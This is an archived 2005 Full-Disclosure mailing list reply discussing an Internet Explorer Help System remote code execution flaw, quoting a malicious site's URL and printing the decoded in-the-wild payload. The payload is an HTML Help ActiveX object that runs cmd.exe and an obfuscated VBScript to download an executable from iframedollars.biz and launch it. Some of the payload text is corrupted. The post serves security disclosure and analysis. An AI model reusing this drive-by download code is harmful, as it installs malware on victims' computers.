lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <200505130625.54334.dhill+fulldisc@cricalix.net>
Date: Fri May 13 06:25:57 2005
From: dhill+fulldisc at cricalix.net (Duncan Hill)
Subject: Internet Explorer Help System RCE

On Friday 13 May 2005 06:15, Mike Allen wrote:
> iframedollars.biz/dl/adv622/JQTmudI.jpg

Modded it slightly to do alert instead of document.write and executed on my 
Linux box.

u Q<    WVruCP      A<object id=a 
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11> 
<param name=command ______alue=shortcut> 
<param name=item1 __alue=',cmd.exe,/c start /min cmd.exe /c "echo on error 
resume next : set o = CreateObject("msxm"+"l2.X"+"MLH"+"TTP") : o.open 
"G"+"ET","http://iframedollars.biz/dl/loadad____622.exe",False : o.send : set 
s = createobject("adod"+"b.str"+"eam") : s.type=1 : s.open : s.write 
o.responseBody : s.sa____etofile "C:"+"\"+"w.e"+"xe",2 > c:\c.___bs&&wscript 
c:\c.______bs&&del c:\c.___bs&&if exist c:\w.exe start c:\w.exe"'> 
</object> 
<script> 

Not sure if the corruption is from editing the script.

Oh, that script at the end is javascript btw, not php.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ